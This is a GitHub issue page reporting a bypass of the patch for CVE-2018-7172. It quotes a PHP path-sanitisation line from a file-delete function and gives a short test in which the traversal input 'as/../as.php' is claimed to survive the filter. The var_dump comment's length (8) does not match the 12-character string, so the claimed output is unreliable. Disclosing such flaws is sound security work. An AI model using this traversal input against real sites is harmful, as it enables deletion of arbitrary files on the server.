Skip to content

CVE-2018-7172 Patch bypass  #124

Description

@ASDWQad

deleteFileThemePluginAction()
$filename = isset($_REQUEST[$request]) ? str_ireplace(['./', '../', '..', '', '/'], null, trim($_REQUEST[$request])) : false;

$file="as/../as.php";
$a=str_ireplace(['./', '../', '..', '', '/'], null, trim($file));
var_dump($a); //string(8) "as/../as.php"

Metadata

Metadata

Assignees

No one assigned

    Labels

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions